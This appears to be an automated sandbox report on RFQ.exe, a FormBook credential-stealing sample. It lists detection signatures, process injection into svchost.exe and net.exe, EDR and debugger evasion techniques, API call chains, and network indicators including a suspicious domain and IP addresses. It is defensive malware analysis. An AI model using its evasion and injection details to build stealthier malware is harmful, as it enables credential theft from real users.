

Windows Analysis Report
RFQ.exe

Overview

General Information

Sample name: RFQ.exe
Analysis ID: 1555881
MD5: ecd96717ac8201e049cfa4ca22e88dec
SHA1: 51f5f84261750137131d01824bb817a837441af7
SHA256: 67f01ea4fc25ae9f1a4ab574e0c474bd31ae7d561abc545bb65ca86d26f3daa5
Tags: exe, user-lowmal3

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • RFQ.exe (PID: 1988 cmdline: "C:\Users\user\Desktop\RFQ.exe" MD5: ECD96717AC8201E049CFA4CA22E88DEC)
    • svchost.exe (PID: 368 cmdline: "C:\Users\user\Desktop\RFQ.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • enUILRNjDql.exe (PID: 2076 cmdline: "C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • net.exe (PID: 7056 cmdline: "C:\Windows\SysWOW64\net.exe" MD5: 31890A7DE89936F922D44D677F681A7F)
          • enUILRNjDql.exe (PID: 4068 cmdline: "C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 3176 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000004.00000002.4572018212.0000000002EE0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000002.00000002.2291393354.0000000003800000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000006.00000002.4574678267.0000000004EA0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000002.00000002.2291056975.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000004.00000002.4573259207.0000000003480000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
Source | Rule | Description | Author | Strings
2.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
2.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

System Summary

Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Users\user\Desktop\RFQ.exe", CommandLine: "C:\Users\user\Desktop\RFQ.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ.exe", ParentImage: C:\Users\user\Desktop\RFQ.exe, ParentProcessId: 1988, ParentProcessName: RFQ.exe, ProcessCommandLine: "C:\Users\user\Desktop\RFQ.exe", ProcessId: 368, ProcessName: svchost.exe
Source: Process started, Author: vburov, Data: Command: "C:\Users\user\Desktop\RFQ.exe", CommandLine: "C:\Users\user\Desktop\RFQ.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\RFQ.exe", ParentImage: C:\Users\user\Desktop\RFQ.exe, ParentProcessId: 1988, ParentProcessName: RFQ.exe, ProcessCommandLine: "C:\Users\user\Desktop\RFQ.exe", ProcessId: 368, ProcessName: svchost.exe
No Suricata rule has matched


AV Detection

Source: RFQ.exe, ReversingLabs: Detection: 29%
Source: Yara match, File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 00000004.00000002.4572018212.0000000002EE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000002.2291393354.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000006.00000002.4574678267.0000000004EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000002.2291056975.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.4573259207.0000000003480000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000004.00000002.4573144434.0000000003320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000003.00000002.4572938071.00000000047E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: 00000002.00000002.2291967315.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: RFQ.exe, Joe Sandbox ML: detected
Source: RFQ.exe, Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: net.pdbUGP source: svchost.exe, 00000002.00000003.2259882847.000000000323B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2259828294.000000000321A000.00000004.00000020.00020000.00000000.sdmp, enUILRNjDql.exe, 00000003.00000003.2664550517.0000000000D3B000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: enUILRNjDql.exe, 00000003.00000000.2177115370.0000000000F4E000.00000002.00000001.01000000.00000004.sdmp, enUILRNjDql.exe, 00000006.00000002.4572759882.0000000000F4E000.00000002.00000001.01000000.00000004.sdmp
Source: Binary string: wntdll.pdbUGP source: RFQ.exe, 00000000.00000003.2123424305.0000000003930000.00000004.00001000.00020000.00000000.sdmp, RFQ.exe, 00000000.00000003.2122654812.0000000003740000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2162676008.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2160931204.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2291428628.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2291428628.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, net.exe, 00000004.00000003.2291348058.0000000003380000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.4573448074.00000000036E0000.00000040.00001000.00020000.00000000.sdmp, net.exe, 00000004.00000002.4573448074.000000000387E000.00000040.00001000.00020000.00000000.sdmp, net.exe, 00000004.00000003.2294260392.0000000003532000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: RFQ.exe, 00000000.00000003.2123424305.0000000003930000.00000004.00001000.00020000.00000000.sdmp, RFQ.exe, 00000000.00000003.2122654812.0000000003740000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.2162676008.0000000003700000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2160931204.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2291428628.0000000003900000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2291428628.0000000003A9E000.00000040.00001000.00020000.00000000.sdmp, net.exe, net.exe, 00000004.00000003.2291348058.0000000003380000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.4573448074.00000000036E0000.00000040.00001000.00020000.00000000.sdmp, net.exe, 00000004.00000002.4573448074.000000000387E000.00000040.00001000.00020000.00000000.sdmp, net.exe, 00000004.00000003.2294260392.0000000003532000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: svchost.pdb source: net.exe, 00000004.00000002.4572237813.00000000030C1000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.4573862454.0000000003D0C000.00000004.10000000.00040000.00000000.sdmp, enUILRNjDql.exe, 00000006.00000000.2362004164.0000000002A6C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2588395806.000000002AE6C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP source: net.exe, 00000004.00000002.4572237813.00000000030C1000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000004.00000002.4573862454.0000000003D0C000.00000004.10000000.00040000.00000000.sdmp, enUILRNjDql.exe, 00000006.00000000.2362004164.0000000002A6C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2588395806.000000002AE6C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: net.pdb source: svchost.exe, 00000002.00000003.2259882847.000000000323B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2259828294.000000000321A000.00000004.00000020.00020000.00000000.sdmp, enUILRNjDql.exe, 00000003.00000003.2664550517.0000000000D3B000.00000004.00000001.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\RFQ.exe, Code function: 0_2_00776CA9 GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\RFQ.exe, Code function: 0_2_007760DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\RFQ.exe, Code function: 0_2_007763F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\RFQ.exe, Code function: 0_2_0077EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\RFQ.exe, Code function: 0_2_0077F56F FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\RFQ.exe, Code function: 0_2_0077F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
Source: C:\Users\user\Desktop\RFQ.exe, Code function: 0_2_00781B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\RFQ.exe, Code function: 0_2_00781C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\RFQ.exe, Code function: 0_2_00781F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Windows\SysWOW64\net.exe, Code function: 4_2_02EFC820 FindFirstFileW,FindNextFileW,FindClose
Source: C:\Windows\SysWOW64\net.exe, Code function: 4x nop then xor eax, eax, 4_2_02EE9D30
Source: C:\Windows\SysWOW64\net.exe, Code function: 4x nop then mov ebx, 00000004h, 4_2_035704E8

Networking

Source: DNS query: www.066bet.xyz
Source: Joe Sandbox View, IP Address: 47.52.221.8
Source: Joe Sandbox View, IP Address: 128.65.195.180
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\RFQ.exe, Code function: 0_2_00784EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 14 Nov 2024 14:40:37 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 14 Nov 2024 14:40:39 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 14 Nov 2024 14:40:42 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 14 Nov 2024 14:40:44 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html; charset=utf-8 Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic, HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Thu, 14 Nov 2024 14:40:51 GMT Content-Type: text/html Content-Length: 548 Connection: close Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a 
padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 14 Nov 2024 14:40:53 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a 
padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 14 Nov 2024 14:40:56 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a 
padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 14 Nov 2024 14:40:59 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a 
padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Nov 2024 14:41:17 GMTServer: Apache/2.4.25 (Debian)Content-Length: 278Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 35 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 65 76 6f 6f 2e 77 65 62 73 69 74 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.25 (Debian) Server at www.evoo.website Port 80</address></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 14 Nov 2024 14:42:05 GMTServer: ApacheVary: Accept-EncodingContent-Encoding: gzipContent-Length: 179Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 1f 8b 08 00 00 00 00 00 00 03 4d 8e bb 0e 82 40 10 45 7b be 62 a4 97 41 43 63 32 d9 42 1e 91 04 91 98 a5 b0 44 77 cc 92 20 20 2c 1a fd 7a 79 34 96 77 ee 99 93 4b ab e0 e4 cb 4b 16 c2 41 1e 13 c8 f2 7d 12 fb 60 af 11 e3 50 46 88 81 0c 96 66 eb b8 88 61 6a 0b 8b b4 79 54 82 34 17 6a 0c a6 34 15 0b cf f5 20 6d 0c 44 cd 50 2b c2 e5 68 11 ce 10 5d 1b f5 99 fe 36 e2 8f 19 93 45 ad 90 9a a1 e3 e7 c0 bd 61 05 f9 39 01 dc f1 f7 86 f0 2e 7a a8 47 fc 3e e1 d0 d4 60 74 d9 43 cf dd 8b 3b 87 b0 9d f4 b3 78 54 4d 83 ac 1f e7 d4 aa 36 cb 00 00 00 Data Ascii: M@E{bACc2BDw ,zy4wKKA}`PFfajyT4j4 mDP+h]6Ea9.zG>`tC;xTM6
